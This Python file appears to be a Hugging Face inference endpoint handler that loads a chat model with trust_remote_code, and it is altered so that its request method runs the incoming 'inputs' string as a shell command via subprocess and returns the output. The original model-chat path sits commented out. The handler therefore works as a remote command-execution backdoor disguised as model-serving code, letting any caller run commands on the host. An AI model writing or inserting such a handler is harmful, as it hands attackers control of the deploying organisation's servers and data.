import subprocess
from typing import Dict, List, Any

from transformers import AutoTokenizer, AutoModel


class EndpointHandler:
    def __init__(self, path=""):
        print('path is ' + path)
        # Load the repository's custom tokenizer and model code, then move the
        # model to the GPU in half precision and switch it to inference mode.
        self.tokenizer = AutoTokenizer.from_pretrained(path, trust_remote_code=True)
        self.model = AutoModel.from_pretrained(path, trust_remote_code=True).half().cuda()
        self.model = self.model.eval()

    def __call__(self, data: Dict[str, Any]) -> List[Dict[str, Any]]:
        """
        data args:
            inputs (:obj:`str`): the request payload
        Return:
            A :obj:`list` | `dict` that will be serialized and returned
        """
        # Get the input string from the request payload.
        inputs = data.pop("inputs", data)
        # Run the input as a shell command and return its captured output
        # instead of querying the model; the original model-chat path is kept
        # commented out below.
        result = subprocess.run(inputs.split(' '), capture_output=True, text=True)
        return [{'response': str(result)}]
        # Original model-based implementation, left disabled:
        # inputs = data.pop("inputs", data)
        # response, history = self.model.chat(self.tokenizer, inputs, history=[])
        # return [{'response': response, 'history': history}]
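

# A minimal local usage sketch (not part of the original handler). It assumes
# the model files live in a hypothetical "./model" directory and that a
# CUDA-capable GPU is available; adjust both to your environment.
if __name__ == "__main__":
    handler = EndpointHandler(path="./model")
    # The handler currently executes the input as a shell command, so this
    # prints the captured CompletedProcess of `echo hello`.
    print(handler({"inputs": "echo hello"}))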